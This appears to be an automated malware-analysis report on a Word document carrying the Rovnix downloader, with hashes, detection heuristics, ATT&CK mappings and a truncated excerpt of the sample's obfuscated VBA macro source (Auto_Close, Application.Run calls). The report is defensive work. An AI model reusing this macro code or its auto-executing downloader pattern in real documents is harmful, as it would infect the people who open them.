Rovnix — Office (OOXML) malware analysis

Static analysis result for SHA-256 2f1ba123b907b670…

Verdict: MALICIOUS

File type: Office (OOXML)
Size: 76.5 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-04-06
MD5: 14d7193a97f997ec91c3f96cae313cdc
SHA-1: fe266d93a7c39e564dd94e9d8c4b217977064af4
SHA-256: 2f1ba123b907b6706e46991d1fce4e4fab12d7bc085ee3f1c0833de59b03cacf
Risk Score: 262

Malware Insights

Rovnix · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Rovnix-6497736-0. Static analysis reveals VBA macros, specifically an Auto_Close macro that uses CreateObject to execute code. The script attempts to run (via Application.Run) functions named 'cdoykgkdcvkwyq' and 'rbwbffkzjqwxjbzjxy', indicating that it is designed to download and execute a secondary payload. The Rovnix family signature together with the downloader behaviour strongly suggests this attack pattern.

Heuristics (6)

  • ClamAV: Doc.Downloader.Rovnix-6497736-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
  • VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 3 related findings)
    Document contains a VBA project — VBA macros present
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Every URL below was found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 20653 bytes
  SHA-256: 55263cb74b373b6d9e286147e2b293a590e6d7fc636f26fd48bc757651f35942

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dwfdvjqwbovzqz()
  zwrubku = "of" + "qfjr" + "juu" + Left("yzviixquyz", 10) + Left("kzcbvkgbco", 1)
ocnbikjycy = "wrgg" + "vbvrnvjkox" + Left("vukdgbivwi", 10) + Left("iiynjvfnjj", 10)
kwcqfjdjnqwo = Left("cizdvzogjf", 1) + "fyqdgqury" + "jn"
jrvowvf = Left("ooqyobginb", 6) + "fodzfibjf" + "gvrj" + "jkkwffowi"
  Application.Run "cdoykgkdcvkwyq"
  iurokdvq = "iznkuwy" + "ngquonvrxuujx" + "jnx" + Left("ovbrkwdurd", 2)
vfzgjikjivr = Left("cjwbnnrzgg", 4) + "cgz" + "ckkobjvudg" + "ccjq"
nrzovkvxcycw = RTrim("bwfioyyuuvqdcknoongfq") + "fvbfxqxuogoxrwgofwrbrjbgzdbkr"
dofcdfnbjxx = "fqjduniidvcqorkzq" + "ivxfiydorokwbkznkvvoogckj"
ndriyicrkgdn = "fdbuozqriukdoq" + "iwgndojwvyybjv" + Left("ukwzbwqkzf", 7)
End Sub
Sub rgfykdcwxoxvvj()
  oinbzzzbnrd = xikcbgggkdgwvgwyf(3494) + xikcbgggkdgwvgwyf(1408) + 1659 + 2818 + 3875 + xikcbgggkdgwvgwyf(4830) + xikcbgggkdgwvgwyf(2739)
brzxwcxz = RTrim("xcdckvcqzjfnxbwnfj") + "kuygxyoovo" + "dwfvbqcoyncczigczkbrc" + RTrim("grb")
  Application.Run "rbwbffkzjqwxjbzjxy"
  dbbxyvfj = xikcbgggkdgwvgwyf(3901) + xikcbgggkdgwvgwyf(1105) + xikcbgggkdgwvgwyf(4751) + 4628
fuyzucvkq = "wxrqo" + RTrim("bvjdwfwnjbuqfzgbogju") + "cjdcdquyjrn" + RTrim("urby") + RTrim("nuijjfjyyfgnzrrvwzq")
xdvwjbgwbvyv = RTrim("qddxfnufzcuckynnouqqroj") + LTrim("brzgoxjgdcdwwgxo") + "vyucdqniyrcxwjyyzrby"
bxfzvvxcwr = LTrim("idgyccfrfb") + RTrim("nqdjqwfdfbzvbxu") + "jbzyfdwdcyfwjzgixf" + RTrim("byo")
End Sub
Function xikcbgggkdgwvgwyf(X)
 xikcbgggkdgwvgwyf = Atn(X) - Atn(1)
End Function

Public Function cyfgcvvrzgdfqvx(qgkkyqbyoizzjczy, bgqfunjrdybdbibikw, zydruqqnkcwzq)
  rwgzyqdj = "f" + "nbqryiuwfbxfqbzjvv" + "yuyxyrzvqnfggruuxdcvrjjqkkfbr" + "dbiwfc"
oggvgcrxnbnc = xikcbgggkdgwvgwyf(2929) + xikcbgggkdgwvgwyf(2345) + xikcbgggkdgwvgwyf(1861)
ivrzorg = "cqrkycvfjwzcug" + "kgjxuduycjyi"
vkuvxbj = "yrccjwyiwqvd" + Left("fbruqwqvov", 3) + Left("vvfufkjwwg", 8)
  cyfgcvvrzgdfqvx = Replace(qgkkyqbyoizzjczy, bgqfunjrdybdbibikw, zydruqqnkcwzq)
  ovgcbog = LTrim("jywrxrggjyciqzxzvuovqnnwjcwu") + "qxwuzqcvzcrzgbvxwuijgvqyvoo" + RTrim("wqgcnrfydcrvu") + LTrim("bogbdwcgboigijgqznvdv") + RTrim("dgifqkkqfqrkvznvkn") + RTrim("gvrvrfbuonncwgr")
bgrouui = 1285 - xikcbgggkdgwvgwyf(336) - 3054
xngxzqzy = xikcbgggkdgwvgwyf(4460) + xikcbgggkdgwvgwyf(2170)
cuurvffg = "ykivzkkkixqn" + RTrim("xibkgvzdjnjgcnvjrdivyoq")
wuqioduvfdv = 3967 - xikcbgggkdgwvgwyf(536) - 4289 - xikcbgggkdgwvgwyf(3610)
uzfnjgvur = "czubifuijnjb" + Left("ikibkcdodz", 7) + Left("xrdzugkodf", 7) + Left("vvdvqzuqyd", 2)
  ufufxnii = Left("iwnfvgwwvw", 10) + "fiwcgjini" + "cicwxjv" + "wiqjfbn"
vqrqdwbdxr = "qo" + Left("kckybvvgin", 7) + Left("vfcnncqrfj", 7) + Left("qygxxqxiwn", 1)
dxwfrnfgw = "qvzvqgczwu" + "kgudguzgofjndrqkjqukdygfufkx" + LTrim("fxikir") + LTrim("bzboyfw")
ciiirwr = xikcbgggkdgwvgwyf(1418) - 3684 - 876
zynqzzugwucf = xikcbgggkdgwvgwyf(2422) + 174 + 2289 + xikcbgggkdgwvgwyf(2084) + 2593 + xikcbgggkdgwvgwyf(592)
  qcyfowyvgxj = xikcbgggkdgwvgwyf(3834) - 4561 - xikcbgggkdgwvgwyf(4903) - xikcbgggkdgwvgwyf(3882) - 1798 - 505
irxgwzybciw = "nwnx" + "uzjiuor" + "cvjvknodwn" + Left("zdiidijxci", 4) + "dd"
wgjcnddjgc = 515 - 1783 - xikcbgggkdgwvgwyf(1254)
gdzuououjcyc = 2403 - xikcbgggkdgwvgwyf(3239) - xikcbgggkdgwvgwyf(1480) - 945 - xikcbgggkdgwvgwyf(4814)
fkfcfoijbxjv = 3844 - 3957 - xikcbgggkdgwvgwyf(1397)
End Function

Sub rbwbffkzjqwxjbzjxy()
 vknvvgnccxx = "ycyciud" + "wuqugyfbgfkvibibcinqbqbubwqbik"
gwfoocuqwwiz = RTrim("ocgxodnkgfwdwnczvrqkfzgkvdjnn") + "znwzkojyiivvvbw" + "xngvwxzrzzrkdx" + RTrim("rvqgugbfcnxwjdnkukvdqbykdgydbw")
cxzrjukynz = Left("ybjoigubbc", 4) + "rgwfruwuwyzd"
ndwyxfzy = Left("orwgrrorfj", 2) + Left("bjbrjrofrv", 4) + Left("cyzdngxjgv", 4)
kgkdcvkwyqbq = 742 + xikcbgggkdgwvgwyf(636) + xikcbgggkdgwvgwyf
... (truncated)

  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 47104 bytes
  SHA-256: e90e8ceaa72c3e122ccc8ff966f684430e644024efb3adc5283f82e37c5cb21d
  Detection: ClamAV: Doc.Downloader.Rovnix-6497736-0
  Obfuscation or payload: unlikely